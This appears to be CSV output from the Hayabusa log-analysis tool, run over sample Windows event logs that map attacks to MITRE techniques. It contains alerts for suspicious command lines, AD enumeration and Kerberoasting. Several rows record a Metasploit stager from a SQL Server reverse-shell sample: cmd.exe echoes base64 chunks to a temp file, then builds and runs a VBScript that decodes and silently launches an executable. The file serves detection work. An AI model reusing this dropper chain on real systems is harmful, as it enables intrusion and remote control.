AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQACAAIAAAAOAAIAAgAAAA4APwAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAMYGAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAKIGAAABADAANAAwADkAMAA0AGIAMAAAADAEDAIBAEMAbwBtAG0AZQBuAHQAcwAAAEwAaQBjAGUAbgBzAGUAZAAgAHUAbgBkAGUAcgAgAHQAaABlACAAQQBwAGEAYwBoAGUAIABMAGkAYwBlAG4AcwBlACwAIABWAGUAcgBzAGkAbwBuACAAMgAuADAAIAAoAHQAaABlACAAIgBMAGkAYwBlAG4AcwBlACIAKQA7ACAAeQBvAHUAIABtAGEAeQAgAG4AbwB0ACAAdQBzAGUAIAB0AGgAaQBzACAAZgBpAGwAZQAgAGUAeABjAGUAcAB0ACAAaQBuACAAYwBvAG0AcABsAGkAYQBuAGMAZQAgAHcAaQB0AGgAIAB0AGgAZQAgAEwAaQBjAGUAbgBzAGUALgAgAFkAbwB1ACAAbQBhAHkAIABvAGIAdABhAGkAbgAgAGEAIABjAG8AcAB5ACAAbwBmACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAYQB0AA0ACgANAAoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAcABhAGMAaABlAC4AbwByAGcALwBsAGkAYwBlAG4AcwBlAHMALwBMAEkAQwBFAE4AUwBFAC0AMgAuADAADQAKAA0ACgBVAG4AbABlAHMAcwAgAHIAZQBxAHUAaQByAGUAZAAgAGIAeQAgAGEAcABwAGwAaQBjAGEAYgBsAGUAIABsAGEAdwAgAG8AcgAgAGEAZwByAGUAZQBkACAAdABvACAAaQBuACAAdwByAGkAdABpAG4AZwAsACAAcwBvAGYAdAB3AGEAcgBlACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAaQBzACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAbwBuACAAYQBuACAAIgBBAFMAIABJAFMAIgAgAEIAQQBTAEkAUwAsACAAVwBJAFQASABPAFUAVAAgAFcAQQBSAFIAQQBOAFQASQBFAFMAIABPAFIAIABDAE8ATgBEAEkAVABJAE8ATgBTACAATwBGACAAQQBOAFkAIABLAEkATgBEACwAIABlAGkAdABoAGUAcgAgAGUAeABwAHIAZQBzAHMAIABvAHIAIABpAG0AcABsAGkAZQBkAC4AIABTAGUAZQAgAHQAaABlACAATABpAGMAZQBuAHMAZQAgAGYAbwByACAAdABoAGUAIABzAHAAZQBjAGkAZgBpAGMAIABsAGEAbgBnAHUAYQBnAGUAIABnAG8AdgBlAHIA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo bgBpAG4AZwAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAgAGEAbgBkACAAbABpAG0AaQB0AGEAdABpAG8AbgBzACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlAC4AAABWABsAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAAUwBvAGYAdAB3AGEAcgBlACAARgBvAHUAbgBkAGEAdABpAG8AbgAAAAAAagAhAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEEAcABhAGMAaABlAEIAZQBuAGMAaAAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlACAAdQB0AGkAbABpAHQAeQAAAAAALgAHAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAyAC4AMgAuADEANAAAAAAALgAHAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABhAGIALgBlAHgAZQAAAAAAggAvAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIAAyADAAMAA5ACAAVABoAGUAIABBAHAAYQBjAGgAZQAgAFMAbwBmAHQAdwBhAHIAZQAgAEYAbwB1AG4AZABhAHQAaQBvAG4ALgAAAAAANgAHAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAGEAYgAuAGUAeABlAAAAAABGABMAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAASABUAFQAUAAgAFMAZQByAHYAZQByAAAAAAAyAAcAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAyAC4AMgAuADEANAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAkEsAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = ""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User:  | Svc:  | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
